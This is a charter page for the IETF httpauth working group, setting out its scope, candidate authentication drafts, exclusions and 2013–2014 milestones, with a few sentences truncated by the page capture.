[an error occurred while processing this directive] [an error occurred while processing this directive]


Hypertext Transfer Protocol Authentication (httpauth)


 Current Status: Active

     Yoav Nir 
     Rifaat Shekh-Yusef 

 Security Area Directors:
     Stephen Farrell 
     Kathleen Moriarty 

 Security Area Advisor:
     Kathleen Moriarty 

 Mailing Lists:
     General Discussion: http-auth@ietf.org
     To Subscribe:       https://www.ietf.org/mailman/listinfo/http-auth
     Archive:            https://mailarchive.ietf.org/arch/browse/http-auth/

Description of Working Group:

  Authentication of users to servers over HTTP has always been a weak
  point in web services.  The current HTTP authentication mechanisms,
  basic and digest, pass the credentials in the clear or employ weak
  algorithms and are considered to be insecure today.  Authentication
  through non-standard web forms is much more commonly used, but also
  pass the credentials in the clear.  There is a need for improved
  mechanisms that can replace or augment HTTP authentication without the
  need to rely on transport layer security.  Only HTTP authentication is
  in scope for this WG; form-based or "web" authentication is out of
  The httpauth WG will be a short-lived working group that will document
  a small number of HTTP user authentication schemes that might offer
  security benefits, and that could, following experimentation, be
  widely adopted as standards-track schemes for HTTP user
  authentication. Each of these RFCs will be Informational or
  Experimental, and should include a description of when use of its
  mechanism is appropriate, via a use-case or other distinguishing
  characteristics.  Standards track solutions for HTTP Authentication
  schemes are out of scope, as none of the proposals are expected to be
  sufficiently widely deployed to warrant that status before the WG
  All schemes to be developed in the httpauth WG must be usable with the
  existing HTTP authentication framework, or with evolutions of that
  framework as developed in the httpbis WG. That is, the evolution of
  the HTTP authentication framework is to be done in the httpbis WG and
  not in the httpauth WG.
  The httpauth WG will work closely with the httpbis WG to ensure that
  the outcomes from the httpauth WG do not conflict with work done
  The drafts currently under consideration as WG items include:
  - draft-williams-http-rest-auth
  - draft-oiwa-http-mutualauth and draft-oiwa-http-auth-extension
  - draft-farrell-httpbis-hoba
  - draft-montenegro-httpbis-multilegged-auth
  - draft-melnikov-httpbis-scram-auth
  The WG will produce two standards track documents that will obsolete
  the basic and digest schemes defined in RFC 2617 taking into account
  errata on that specification. 
  For the digest scheme, the new specification will incorporate "more
  modern" algorithm agility and internationalization support, which
  requires input from internationalization experts.
  draft-ahrens-httpbis-digest-auth-update documents one possible
  approach that the WG could adopt and modify as it sees fit.
  For the basic scheme, no technical changes are envisaged other than to
  handle internationalization of usernames and passwords.  The goal is
  to improve the scheme's documentation and to obsolete RFC 2617, which
  has some significant flaws that have emerged through 13 years of
  The WG is not required to merge all proposals into one. The goal is
  not to produce "perfect" mechanisms, but to review and improve
  proposals and to quickly produce stable specifications for the purpose
  of obtaining implementation and deployment experience.  The working
  group will then close, and any further culling or refinement of the
  experimental mechanisms will be done in another context.
  It is expected that the market/community will select which if any of
  the RFCs developed might be worth progressing on the standards-track
  at a later date, in a different WG.
  Adoption of additional work items is not expected and will require a
  The following are explicitly out of scope:
  - changes to TLS
  - changes to HTTP, except for those made in the httpbis WG
  - definition of authentication mechanisms that do not work with
    the HTTP authentication framework
  - authentication schemes that distinguish between devices and humans
  - authentication schemes that cannot be sensibly used for and
    by humans
  - "web" authentication that is not HTTP authentication

Goals and Milestones:
  May 2013 - Adopt -00 version of experimental drafts
  Jun 2013 - Adopt -00 version of Basic and Digest update drafts (or a "basic+digest" draft - singular)
  Oct 2013 - Send basic+digest to IETF LC (following WGLC, of course)
  Nov 2013 - Begin WGLC on experimental drafts
  Feb 2014 - All experimental drafts to IETF LC
  Jun 2014 - Recharter or close

[an error occurred while processing this directive]